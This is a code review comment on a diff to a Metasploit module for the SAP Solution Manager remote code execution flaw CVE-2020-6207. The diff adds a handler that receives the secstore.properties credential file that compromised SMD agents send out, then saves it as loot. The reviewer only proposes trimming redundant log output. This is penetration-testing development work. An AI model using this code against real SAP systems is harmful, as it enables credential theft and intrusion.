modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb

```diff
@@ -96,6 +106,75 @@ def report_service_and_vuln
     )
   end
 
+  # Handle incoming HTTP requests from connected agents
+  def on_request_uri(cli, request, script_name)
+    setup_xml_and_variables
+    @script_name = script_name
+
+    response = create_response(200, 'OK')
+    response.body = 'Received'
+    cli.send_response(response)
+
+    agent_host = cli.peerhost
+    request_uri = request.raw_uri
+    secstore_content = request.body
+    secstore_filename = request.headers['X-File-Name']
+
+    if secstore_content.nil? || secstore_filename.nil? || agent_host.nil? || request_uri.nil? || request_uri != "/#{@script_name}"
+      fail_with(Failure::PayloadFailed, "Failed to retrieve secstore.properties file from agent #{@agent_name}.")
+    end
+    print_status("Received HTTP request from agent #{@agent_name} - #{agent_host}")
+
+    # Loot secstore.properties file
+    loot = store_loot('smdagent.secstore.properties', 'text/plain', agent_host, secstore_content, secstore_filename, 'SMD Agent secstore.properties file')
+    vprint_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} file content:\n#{secstore_content}")
+    print_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} saved in: #{loot}")
```

Comment:
These two messages look redundant to me. If `VERBOSE` is `true`, both messages will be displayed. I would change this to only print the file content when `VERSBOSE` is `true`:
```suggestion
    print_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} saved in: #{loot}")
    vprint_good("File content:\n#{secstore_content}")
```